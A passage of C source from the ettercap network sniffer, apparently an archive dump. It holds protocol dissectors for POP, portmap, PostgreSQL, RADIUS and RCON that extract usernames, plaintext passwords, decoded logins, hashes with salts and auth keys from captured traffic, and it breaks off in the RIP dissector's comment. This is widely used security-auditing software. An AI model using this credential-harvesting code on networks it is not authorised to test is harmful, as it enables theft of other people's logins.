DEBUG_MSG("\tdissector_pop BANNER"); /* remove the \r\n */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '\r')) != NULL ) *ptr = '\0'; /* remove the trailing msg-id <...> */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '<')) != NULL ) { /* save the msg-id for APOP authentication */ s->data = strdup((const char*)ptr); /* save the session */ *(ptr - 1) = '\0'; } else { /* fake the msgid if it does not exist */ s->data = strdup(""); } } else if (!strcmp(s->data, "AUTH")) { /* * the client has requested AUTH LOGIN, * check if the server support it * else delete the session */ if (strstr((const char*)ptr, "-ERR")) dissect_wipe_session(PACKET, DISSECT_CODE(dissector_pop)); } } SAFE_FREE(ident); return NULL; } /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("POP --> TCP dissector_pop"); /* skip the whitespaces at the beginning */ while(*ptr == ' ' && ptr != end) ptr++; /* reached the end */ if (ptr == end) return NULL; /* * USER & PASS authentication: * * USER user * PASS pass */ if ( !strncasecmp((const char*)ptr, "USER ", 5) ) { DEBUG_MSG("\tDissector_POP USER"); /* destroy any previous session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_pop)); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_pop)); ptr += 5; /* if not null, free it */ SAFE_FREE(s->data); /* fill the session data */ s->data = strdup((const char*)ptr); s->data_len = strlen((const char*)ptr); if ( (ptr = (u_char*)strchr(s->data,'\r')) != NULL ) *ptr = '\0'; /* save the session */ session_put(s); return NULL; } /* harvest the password */ if ( !strncasecmp((const char*)ptr, "PASS ", 5) ) { DEBUG_MSG("\tDissector_POP PASS"); ptr += 5; /* create an ident to retrieve the session */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_pop)); /* retrieve the session and delete it */ if (session_get_and_del(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } SAFE_FREE(ident); /* check that the user was sent before the pass */ if (s->data == NULL) { return NULL; } /* * if the PASS command is issued before the USER one, we have to APOP * digest in the s->data. we can check it on the first char. who has an * username beginning with '<' ??? :) */ if (*(char *)(s->data) == '<') { return NULL; } /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data); PACKET->DISSECTOR.pass = strdup((const char*)ptr); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; /* free the session */ session_free(s); /* print the message */ DISSECT_MSG("POP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } /* * APOP authentication : * * APOP user md5-digest * * MD5-diges is computed on "pass" */ if ( !strncasecmp((const char*)ptr, "APOP ", 5) ) { DEBUG_MSG("\tDissector_POP APOP"); /* create an ident to retrieve the session */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_pop)); /* retrieve the session and delete it */ if (session_get_and_del(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } /* check that the digest was sent before APOP */ if (s->data == NULL) { SAFE_FREE(ident); return NULL; } /* move the pointers to "user" */ ptr += 5; PACKET->DISSECTOR.user = strdup((const char*)ptr); /* split the string */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.user, ' ')) != NULL ) *ptr = '\0'; else { /* malformed string */ SAFE_FREE(PACKET->DISSECTOR.user); session_free(s); SAFE_FREE(ident); return NULL; } /* skip the \0 */ ptr += 1; /* save the user */ PACKET->DISSECTOR.pass = strdup((const char*)ptr); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; /* set the info */ PACKET->DISSECTOR.info = strdup(s->data); /* free the session */ session_free(s); SAFE_FREE(ident); /* print the message */ DISSECT_MSG("POP : %s:%d -> USER: %s MD5-digest: %s %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * AUTH LOGIN * * digest(user) * digest(pass) * * the digests are in base64 */ if ( !strncasecmp((const char*)ptr, "AUTH LOGIN", 10) ) { DEBUG_MSG("\tDissector_POP AUTH LOGIN"); /* destroy any previous session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_pop)); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_pop)); /* remember the state (used later) */ s->data = strdup("AUTH"); /* save the session */ session_put(s); /* username is in the next packet */ return NULL; } /* search the session (if it exist) */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_pop)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } SAFE_FREE(ident); /* the session is invalid */ if (s->data == NULL) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_pop)); return NULL; } /* collect the user */ if (!strcmp(s->data, "AUTH")) { char *user; int i; DEBUG_MSG("\tDissector_POP AUTH LOGIN USER"); SAFE_CALLOC(user, strlen((const char*)ptr), sizeof(char)); /* username is encoded in base64 */ i = base64decode((const char*)ptr, &user); SAFE_FREE(s->data); /* store the username in the session */ SAFE_CALLOC(s->data, strlen("AUTH USER ") + i + 1, sizeof(char) ); snprintf(s->data, strlen("AUTH USER ") + i + 1, "AUTH USER %s", user); SAFE_FREE(user); /* pass is in the next packet */ return NULL; } /* collect the pass */ if (!strncmp(s->data, "AUTH USER", 9)) { char *pass; DEBUG_MSG("\tDissector_POP AUTH LOGIN PASS"); SAFE_CALLOC(pass, strlen((const char*)ptr) + 1, sizeof(char)); /* password is encoded in base64 */ base64decode((const char*)ptr, &pass); /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data + strlen("AUTH USER ")); PACKET->DISSECTOR.pass = strdup(pass); SAFE_FREE(pass); /* destroy the session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_pop)); /* print the message */ DISSECT_MSG("POP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } /* * AUTH PLAIN * * digest(userpass) * * the digests are in base64 */ if ( !strncasecmp((const char*)ptr, "AUTH PLAIN", 10) ) { DEBUG_MSG("\tDissector_POP AUTH PLAIN"); /* destroy any previous session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_pop)); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_pop)); /* remember the state (used later) */ s->data = strdup("AUTH PLAIN"); /* save the session */ session_put(s); /* username is in the next packet */ return NULL; } /* collect the user and pass (the session was retrived above) */ if (!strcmp(s->data, "AUTH PLAIN")) { char *decode; DEBUG_MSG("\tDissector_POP AUTH PLAIN USER and PASS"); SAFE_CALLOC(decode, strlen((const char*)ptr) + 1, sizeof(char)); /* username is encoded in base64 */ base64decode((const char*)ptr, &decode); SAFE_FREE(s->data); /* store the username (skip the null)*/ PACKET->DISSECTOR.user = strdup(decode + 1); /* store the password (skip the null)*/ PACKET->DISSECTOR.pass = strdup(decode + 2 + strlen(decode + 1) ); SAFE_FREE(decode); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_pop)); /* print the message */ DISSECT_MSG("POP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_portmap.c000664 000000 000000 00000017072 13711276346 020737 0ustar00rootroot000000 000000 /* ettercap -- dissector portmap Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ typedef struct { u_int32 xid; u_int32 prog; u_int32 ver; u_int32 proto; u_int32 status; u_int32 next_offs; } portmap_session; #define DUMP 1 #define MAP_LEN 20 #define FIRST_FRAG 0 #define MORE_FRAG 1 #define LAST_FRAG 0x80000000 typedef struct { u_int32 program; u_int32 version; u_char name[32]; FUNC_DECODER_PTR(dissector); } RPC_DISSECTOR; extern FUNC_DECODER(dissector_mountd); RPC_DISSECTOR Available_RPC_Dissectors[] = { {100005, 1, "mountd", dissector_mountd }, {100005, 2, "mountd", dissector_mountd }, {100005, 3, "mountd", dissector_mountd }, { 0, 0, "", NULL } }; /* protos */ FUNC_DECODER(dissector_portmap); void portmap_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init portmap_init(void) { /* UDP come first for the precedence in the dissector list */ dissect_add("portmap", APP_LAYER_UDP, 111, dissector_portmap); dissect_add("portmap", APP_LAYER_TCP, 111, dissector_portmap); } FUNC_DECODER(dissector_portmap) { DECLARE_DISP_PTR_END(ptr, end); u_int32 type, xid, proc, port, proto, program, version, offs, i; portmap_session *pe; struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip packets which are not useful */ if (PACKET->DATA.len < 24) return NULL; DEBUG_MSG("portmap --> dissector_portmap"); /* Offsets differs from TCP to UDP (?) */ if (PACKET->L4.proto == NL_TYPE_TCP) ptr += 4; xid = pntol(ptr); proc = pntol(ptr + 20); type = pntol(ptr + 4); dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_portmap)); /* CALL */ if (FROM_CLIENT("portmap", PACKET)) { if (type != 0 || session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { SAFE_FREE(ident); return NULL; } SAFE_FREE(ident); dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_portmap)); SAFE_CALLOC(s->data, 1, sizeof(portmap_session)); pe = (portmap_session *)s->data; pe->xid = xid; pe->prog = pntol(ptr + 40); pe->ver = pntol(ptr + 44); pe->proto = pntol(ptr + 48); /* DUMP */ if ( proc == 4 ) pe->prog = DUMP; session_put(s); return NULL; } /* REPLY */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } SAFE_FREE(ident); pe = (portmap_session *)s->data; if (!pe) return NULL; /* Unsuccess or not a reply */ if ( (pe->xid != xid || pntol(ptr + 8) != 0 || type != 1) && pe->status != MORE_FRAG) return NULL; /* GETPORT Reply */ if (pe->prog != DUMP) { port = pntol(ptr + 24); for (i=0; Available_RPC_Dissectors[i].program != 0; i++ ) { if ( Available_RPC_Dissectors[i].program == pe->prog && Available_RPC_Dissectors[i].version == pe->ver ) { if (pe->proto == IPPROTO_TCP) { if (dissect_on_port_level((char*)Available_RPC_Dissectors[i].name, port, APP_LAYER_TCP) == E_SUCCESS) break; dissect_add((char*)Available_RPC_Dissectors[i].name, APP_LAYER_TCP, port, Available_RPC_Dissectors[i].dissector); DISSECT_MSG("portmap : %s binds [%s] on port %d TCP\n", ip_addr_ntoa(&PACKET->L3.src, tmp), Available_RPC_Dissectors[i].name, port); } else { if (dissect_on_port_level((char*)Available_RPC_Dissectors[i].name, port, APP_LAYER_UDP) == E_SUCCESS) break; dissect_add((char*)Available_RPC_Dissectors[i].name, APP_LAYER_UDP, port, Available_RPC_Dissectors[i].dissector); DISSECT_MSG("portmap : %s binds [%s] on port %d UDP\n", ip_addr_ntoa(&PACKET->L3.src, tmp), Available_RPC_Dissectors[i].name, port); } break; } } } else { /* DUMP Reply */ /* XXX - It jumps the fragmented entry (if any) */ if (pe->status == MORE_FRAG) offs = pe->next_offs; else offs = 24; while ( (PACKET->DATA.len - offs) >= MAP_LEN ) { program = pntol(ptr + offs + 4); version = pntol(ptr + offs + 8); proto = pntol(ptr + offs + 12); port = pntol(ptr + offs + 16); for (i=0; Available_RPC_Dissectors[i].program != 0; i++) { if ( Available_RPC_Dissectors[i].program == program && Available_RPC_Dissectors[i].version == version ) { if (proto == IPPROTO_TCP) { if (dissect_on_port_level((char*)Available_RPC_Dissectors[i].name, port, APP_LAYER_TCP) == E_SUCCESS) break; dissect_add((char*)Available_RPC_Dissectors[i].name, APP_LAYER_TCP, port, Available_RPC_Dissectors[i].dissector); DISSECT_MSG("portmap : %s binds [%s] on port %d TCP\n", ip_addr_ntoa(&PACKET->L3.src, tmp), Available_RPC_Dissectors[i].name, port); } else { if (dissect_on_port_level((char*)Available_RPC_Dissectors[i].name, port, APP_LAYER_UDP) == E_SUCCESS) break; dissect_add((char*)Available_RPC_Dissectors[i].name, APP_LAYER_UDP, port, Available_RPC_Dissectors[i].dissector); DISSECT_MSG("portmap : %s binds [%s] on port %d UDP\n", ip_addr_ntoa(&PACKET->L3.src, tmp), Available_RPC_Dissectors[i].name, port); } break; } } offs += MAP_LEN; } /* * Offset to the beginning of the first * valid structure in the next packet */ pe->next_offs = (MAP_LEN + 4) - (PACKET->DATA.len - offs); } /* Check if we have to wait for more reply fragments */ if ( PACKET->L4.proto == NL_TYPE_TCP && !(pntol(ptr - 4)&LAST_FRAG) ) pe->status = MORE_FRAG; else dissect_wipe_session(PACKET, DISSECT_CODE(dissector_portmap)); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_postgresql.c000664 000000 000000 00000016036 13711276346 021457 0ustar00rootroot000000 000000 /* ettercap -- dissector for PostgreSQL authentication traffic -- TCP 5432 Copyright (C) Dhiru Kholia (dhiru at openwall.com) Tested with, 1. PostgreSQL 9.2.1 64-bit server on Arch Linux 2. PostgreSQL 9.2.1 64-bit server on Windows 2008 R2 SP1 Special thanks to RhodiumToad from #postgresql Reference: http://www.postgresql.org/docs/9.2/static/protocol.html This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include #include #include #include /* globals */ struct postgresql_status { u_char status; u_char user[65]; u_char type; u_char password[66]; u_char hash[33]; u_char salt[9]; u_char database[65]; }; #define WAIT_AUTH 1 #define WAIT_RESPONSE 2 #define WAIT_RESULT 3 #define MD5 1 #define CT 2 /* protos */ FUNC_DECODER(dissector_postgresql); void postgresql_init(void); /************************************************/ #define GET_ULONG_BE(n,b,i) \ { \ (n) = ( (unsigned long) (b)[(i) ] << 24 ) \ | ( (unsigned long) (b)[(i) + 1] << 16 ) \ | ( (unsigned long) (b)[(i) + 2] << 8 ) \ | ( (unsigned long) (b)[(i) + 3] ); \ } static char itoa16[16] = "0123456789abcdef"; static inline void hex_encode(unsigned char *str, int len, unsigned char *out) { int i; for (i = 0; i < len; ++i) { out[0] = itoa16[str[i]>>4]; out[1] = itoa16[str[i]&0xF]; out += 2; } } /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init postgresql_init(void) { dissect_add("postgresql", APP_LAYER_TCP, 5432, dissector_postgresql); } FUNC_DECODER(dissector_postgresql) { DECLARE_DISP_PTR(ptr); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; struct postgresql_status *conn_status; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; if (FROM_CLIENT("postgresql", PACKET)) { if (PACKET->DATA.len < 4) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_postgresql)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { /* search for user and database strings, look for StartupMessage */ unsigned char *u = memmem(ptr, PACKET->DATA.len, "user", 4); unsigned char *d = memmem(ptr, PACKET->DATA.len, "database", 8); if (!memcmp(ptr + 4, "\x00\x03\x00\x00", 4) && u && d) { /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_postgresql)); /* remember the state (used later) */ SAFE_CALLOC(s->data, 1, sizeof(struct postgresql_status)); conn_status = (struct postgresql_status *) s->data; conn_status->status = WAIT_AUTH; /* user is always null-terminated */ strncpy((char*)conn_status->user, (char*)(u + 5), 65); conn_status->user[64] = 0; /* database is always null-terminated */ strncpy((char*)conn_status->database, (char*)(d + 9), 65); conn_status->database[64] = 0; /* save the session */ session_put(s); } } else { conn_status = (struct postgresql_status *) s->data; if (conn_status->status == WAIT_RESPONSE) { /* check for PasswordMessage packet */ if (ptr[0] == 'p' && conn_status->type == MD5) { DEBUG_MSG("\tDissector_postgresql RESPONSE type is MD5"); if(memcmp(ptr + 1, "\x00\x00\x00\x28", 4)) { DEBUG_MSG("\tDissector_postgresql BUG, expected length is 40"); return NULL; } if (PACKET->DATA.len < 40) { DEBUG_MSG("\tDissector_postgresql BUG, expected length is 40"); return NULL; } memcpy(conn_status->hash, ptr + 5 + 3, 32); conn_status->hash[32] = 0; DISSECT_MSG("%s:$postgres$%s*%s*%s:%s:%d\n", conn_status->user, conn_status->user, conn_status->salt, conn_status->hash, ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_postgresql)); } else if (ptr[0] == 'p' && conn_status->type == CT) { unsigned int length; DEBUG_MSG("\tDissector_postgresql RESPONSE type is clear-text!"); GET_ULONG_BE(length, ptr, 1); length -= 4; if (length > 65 || PACKET->DATA.len < length+5) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_postgresql)); return NULL; } snprintf((char*)conn_status->password, length+1, "%s", (char*)(ptr + 5)); DISSECT_MSG("PostgreSQL credentials:%s-%d:%s:%s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), conn_status->user, conn_status->password); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_postgresql)); } } } } else { /* Packets coming from the server */ if (PACKET->DATA.len < 9) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_postgresql)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct postgresql_status *) s->data; if (conn_status->status == WAIT_AUTH && ptr[0] == 'R' && !memcmp(ptr + 1, "\x00\x00\x00\x0c", 4) && !memcmp(ptr + 5, "\x00\x00\x00\x05", 4)) { conn_status->status = WAIT_RESPONSE; conn_status->type = MD5; DEBUG_MSG("\tDissector_postgresql AUTH type is MD5"); hex_encode(ptr + 9, 4, conn_status->salt); /* save salt */ } else if (conn_status->status == WAIT_AUTH && ptr[0] == 'R' && !memcmp(ptr + 1, "\x00\x00\x00\x08", 4) && !memcmp(ptr + 5, "\x00\x00\x00\x03", 4)) { conn_status->status = WAIT_RESPONSE; conn_status->type = CT; DEBUG_MSG("\tDissector_postgresql AUTH type is clear-text!"); } } } SAFE_FREE(ident); return NULL; } // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_radius.c000664 000000 000000 00000016111 13711276346 020535 0ustar00rootroot000000 000000 /* ettercap -- dissector RADIUS -- TCP/UDP 1645 1646 1812 1813 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * 0 1 2 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Code | Identifier | Length | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | . . . . . . . . . . 16-Bytes Authenticator. . . . . . . . . . | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | * | . . . . . . . . . . . . . Attributes . . . . . . . . . . . . | * | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * * RFC 2865 * * The password is first * padded at the end with nulls to a multiple of 16 octets. A one- * way MD5 hash is calculated over a stream of octets consisting of * the shared secret followed by the Request Authenticator. This * value is XORed with the first 16 octet segment of the password and * placed in the first 16 octets of the String field of the User- * Password Attribute. * * If the password is longer than 16 characters, a second one-way MD5 * hash is calculated over a stream of octets consisting of the * shared secret followed by the result of the first xor. That hash * is XORed with the second 16 octet segment of the password and * placed in the second 16 octets of the String field of the User- * Password Attribute. * * If necessary, this operation is repeated, with each xor result * being used along with the shared secret to generate the next hash * to xor the next segment of the password, to no more than 128 * characters. */ #include #include #include /* globals */ struct radius_header { u_int8 code; /* type of the packet */ #define RADIUS_ACCESS_REQUEST 0x1 #define RADIUS_ACCESS_ACCEPT 0x2 #define RADIUS_ACCESS_REJECT 0x3 #define RADIUS_ACCOUNT_REQUEST 0x4 #define RADIUS_ACCOUNT_RESPONSE 0x5 u_int8 id; /* identifier */ u_int16 length; /* packet length */ u_int8 auth[16]; /* authenticator */ }; #define RADIUS_HEADER_LEN 0x14 /* 12 bytes */ #define RADIUS_ATTR_USER_NAME 0x01 #define RADIUS_ATTR_PASSWORD 0x02 /* proto */ FUNC_DECODER(dissector_radius); void radius_init(void); static u_char * radius_get_attribute(u_int8 attr, u_int8 *attr_len, u_char *begin, u_char *end); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init radius_init(void) { dissect_add("radius", APP_LAYER_UDP, 1645, dissector_radius); dissect_add("radius", APP_LAYER_UDP, 1646, dissector_radius); dissect_add("radius", APP_LAYER_TCP, 1812, dissector_radius); dissect_add("radius", APP_LAYER_UDP, 1812, dissector_radius); dissect_add("radius", APP_LAYER_TCP, 1813, dissector_radius); dissect_add("radius", APP_LAYER_UDP, 1813, dissector_radius); } FUNC_DECODER(dissector_radius) { DECLARE_REAL_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; struct radius_header *radius; u_char *attributes; char *attr; u_int8 attr_len; char user[0xff+1]; char pass[0xff+1]; char auth[0xff]; size_t i; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; DEBUG_MSG("RADIUS --> UDP dissector_radius"); /* parse the packet as a radius header */ radius = (struct radius_header *)ptr; /* get the pointer to the attributes list */ attributes = (u_char *)(radius + 1); /* we are interested only in ACCESS REQUESTS */ if (radius->code != RADIUS_ACCESS_REQUEST) return NULL; /* search for the username attribute */ attr = (char*)radius_get_attribute(RADIUS_ATTR_USER_NAME, &attr_len, attributes, end); /* if the attribute is not found, the packet is not interesting */ if (attr == NULL) return NULL; /* * max attr_len is 0xff * copy the paramenter into the buffer and null terminate it */ memset(user, 0, sizeof(user)); strncpy(user, attr, attr_len); /* search for the password attribute */ attr = (char*)radius_get_attribute(RADIUS_ATTR_PASSWORD, &attr_len, attributes, end); /* if the attribute is not found, the packet is not interesting */ if (attr == NULL) return NULL; /* * max attr_len is 0xff * copy the paramenter into the buffer and null terminate it */ memset(pass, 0, sizeof(pass)); strncpy(pass, attr, attr_len); for (i = 0; i < 16; i++) snprintf(auth + i*2, 3, "%02X", radius->auth[i]); SAFE_CALLOC(PACKET->DISSECTOR.pass, attr_len * 2 + 1, sizeof(char)); /* save the info */ PACKET->DISSECTOR.user = strdup(user); for (i = 0; i < attr_len; i++) snprintf(PACKET->DISSECTOR.pass + i*2, 3, "%02X", pass[i]); PACKET->DISSECTOR.info = strdup(auth); /* display the message */ DISSECT_MSG("RADIUS : %s:%d -> USER: %s PASS: %s AUTH: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * find a radius attribute thru the list */ static u_char * radius_get_attribute(u_int8 attr, u_int8 *attr_len, u_char *begin, u_char *end) { /* sanity check */ if (begin == NULL || end == NULL) return NULL; if (begin > end) return NULL; DEBUG_MSG("radius_get_attribute: [%d]", attr); /* stop when the attribute list ends */ while (begin < end) { /* get the len of the attribute and subtract the header len */ *attr_len = *(begin + 1) - 2; /* we have found our attribute */ if (*begin == attr) { /* return the pointer to the attribute value */ return begin + 2; } /* move to the next attribute */ if (*(begin + 1) > 0) begin += *(begin + 1); else return NULL; } /* not found */ return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_rcon.c000664 000000 000000 00000006104 13711276346 020210 0ustar00rootroot000000 000000 /* ettercap -- dissector RCON -- UDP 27015 27960 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* protos */ FUNC_DECODER(dissector_rcon); void rcon_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init rcon_init(void) { dissect_add("rcon", APP_LAYER_UDP, 27015, dissector_rcon); /* half life */ dissect_add("rcon", APP_LAYER_UDP, 27960, dissector_rcon); /* quake 3 */ } FUNC_DECODER(dissector_rcon) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip messages coming from the server */ if (FROM_SERVER("rcon", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("RCON --> UDP dissector_rcon"); /* * format of an rcon-command: * * 0xFF 0xFF 0xFF 0xFF "RCON authkey command" */ /* not a good packet */ if (memcmp(ptr, "\xff\xff\xff\xff", 4)) return NULL; ptr += 4; if ( !strncasecmp((const char*)ptr, "rcon", 4) ) { u_char *q; DEBUG_MSG("\tDissector_rcon RCON command\n"); ptr += 4; /* skip the whitespaces at the beginning */ while(*ptr == ' ' && ptr != end) ptr++; /* reached the end */ if (ptr == end) return NULL; q = ptr; /* move after the authkey */ while(*q != ' ' && q != end) q++; /* reached the end */ if (q == end) return NULL; PACKET->DISSECTOR.user = strdup("RCON"); SAFE_CALLOC(PACKET->DISSECTOR.pass, q - ptr + 1, sizeof(char)); strlcpy(PACKET->DISSECTOR.pass, (const char*)ptr, q - ptr + 1); SAFE_CALLOC(PACKET->DISSECTOR.info, strlen((const char*)q) + 1, sizeof(char)); snprintf(PACKET->DISSECTOR.info, strlen((const char*)q) + 1, "%s", q); DISSECT_MSG("RCON : %s:%d -> AUTHKEY: %s COMMAND: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_rip.c000664 000000 000000 00000014150 13711276346 020041 0ustar00rootroot000000 000000 /* ettercap -- dissector RIP -- UDP 520 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * RIP version 2 RFC 2453 * * 0 1 2 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * 0 | command (1) | version (1) | must be zero (2) | * +---------------+---------------+-------------------------------+ * 4 | Address Family Identifier (2) | Route Tag (2) | * +-------------------------------+-------------------------------+ * 8 | IP Address (4) | * +---------------------------------------------------------------+ * 12 | Subnet Mask (4) | * +---------------------------------------------------------------+ * 16 | Next Hop (4) | * +---------------------------------------------------------------+ * 20 | Metric (4) | * +---------------------------------------------------------------+ * * * 0 1 2 3 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * 